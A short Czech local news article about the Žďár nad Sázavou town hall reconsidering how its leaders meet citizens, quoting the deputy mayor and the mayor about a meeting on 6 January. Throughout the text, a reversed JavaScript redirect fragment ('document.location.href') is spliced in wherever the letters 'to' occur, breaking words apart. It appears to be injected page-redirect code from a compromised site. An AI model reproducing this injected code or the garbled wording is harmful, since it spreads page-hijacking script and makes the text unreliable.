Rainbow page separator

Žďárská radnice uvažuje o změně při setkávání s občany

Pondělí, 4. ledna 2016

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / O změně při setkávání vedení města s občany uvažuje v novém roce vedení žďárské radnice. „Chodilo tam v poslední době jen několik lidí a ani za minulého vedení města [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nebylo o moc lepší. Na základě diskuse s občany bychom chtěli zvolit nějaký vhodnější rámec, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tak, aby setkávání bylo věcné a efektivní. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bychom se rádi lidí 6. ledna zeptali, jaká témata je zajímají a zda by třeba měli zájem i o názory jiných odborníků než z městského úřadu,“ uvedl žďárský mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Josef Klement.
V [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to smyslu vedení Žďáru chce do věci zainteresovat také zástupce neziskové společnosti Agora CE, která se zabývá zlepšováním komunikace a spolupráce mezi občany a radnicemi a rovněž si klade za cíl probouzet zájem občanů o komunální problémy.
„Loni například byla úspěšná diskuse o budoucnosti Nádražní ulice, které předcházela komen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaná procházka [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ulicí. Diskuse v úřadě se pak zúčastnilo čtyřicet až padesát lidí,“ sdělil starosta Žďáru nad Sázavou Zdeněk Navrátil. Lednové setkání s občany se uskuteční 6. ledna od 17 hodin v zasedací místnosti městského úřadu.